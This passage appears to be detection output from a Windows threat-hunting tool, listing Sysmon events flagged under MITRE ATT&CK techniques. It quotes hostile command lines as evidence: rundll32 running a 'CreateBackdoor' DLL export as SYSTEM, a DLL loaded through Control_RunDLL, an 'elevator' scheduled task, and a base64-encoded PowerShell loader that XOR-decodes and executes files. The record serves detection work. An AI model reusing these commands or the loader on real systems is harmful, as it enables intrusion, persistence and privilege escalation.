<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.014591Z"">
</TimeCreated>
<EventRecordID>243523</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001056711E00</Data>
<Data Name=""ProcessId"">7380</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line (&quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot;) and Parent Image :C:\Windows\System32\sysprep\sysprep.exe , Parent CommandLine (&quot;C:\Windows\System32\sysprep\sysprep.exe&quot;) in directory : ( C:\Windows\system32\WindowsPowerShell\v1.0\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:51.831307Z"">
</TimeCreated>
<EventRecordID>17729</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:51.728</Data>
<Data Name=""ProcessGuid"">365ABB72-28D3-5CDA-0000-001088C71300</Data>
<Data Name=""ProcessId"">3976</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\WindowsPowerShell\v1.0\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002045350100</Data>
<Data Name=""LogonId"">0x13545</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28D3-5CDA-0000-00106DC31300</Data>
<Data Name=""ParentProcessId"">3068</Data>
<Data Name=""ParentImage"">C:\Windows\System32\sysprep\sysprep.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\sysprep\sysprep.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766818.01845,2020-03-21T09:00:18.018450+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.014591Z"">
</TimeCreated>
<EventRecordID>243523</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001056711E00</Data>
<Data Name=""ProcessId"">7380</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T02:32:51.831307Z"">
</TimeCreated>
<EventRecordID>17729</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2024"" ThreadID=""2004"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 02:32:51.728</Data>
<Data Name=""ProcessGuid"">365ABB72-28D3-5CDA-0000-001088C71300</Data>
<Data Name=""ProcessId"">3976</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\WindowsPowerShell\v1.0\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-26E1-5CDA-0000-002045350100</Data>
<Data Name=""LogonId"">0x13545</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
<Data Name=""ParentProcessGuid"">365ABB72-28D3-5CDA-0000-00106DC31300</Data>
<Data Name=""ParentProcessId"">3068</Data>
<Data Name=""ParentImage"">C:\Windows\System32\sysprep\sysprep.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\sysprep\sysprep.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.176847Z"">
</TimeCreated>
<EventRecordID>424081</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.171</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ProcessId"">7552</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">1216</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.176847Z"">
</TimeCreated>
<EventRecordID>424081</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.171</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ProcessId"">7552</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">1216</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490297.209324,2020-10-24T01:58:17.209324+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:17.176847Z"">
</TimeCreated>
<EventRecordID>424081</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:17.171</Data>
<Data Name=""ProcessGuid"">747F3D96-51F9-5F93-0000-001003125E00</Data>
<Data Name=""ProcessId"">7552</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">1216</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920559.894473,2019-05-27T05:29:19.894473+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:19.894473Z"">
</TimeCreated>
<EventRecordID>5970</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:19.834</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6F-5CEB-0000-0010B2D3FF00</Data>
<Data Name=""ProcessId"">3848</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,1557621150.227012,2019-05-12T04:32:30.227012+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( &quot;C:\Windows\System32\schtasks.exe&quot; /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T00:32:30.211387Z"">
</TimeCreated>
<EventRecordID>16243</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1996"" ThreadID=""1832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 00:32:30.023</Data>
<Data Name=""ProcessGuid"">365ABB72-699E-5CD7-0000-001073582200</Data>
<Data Name=""ProcessId"">3876</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
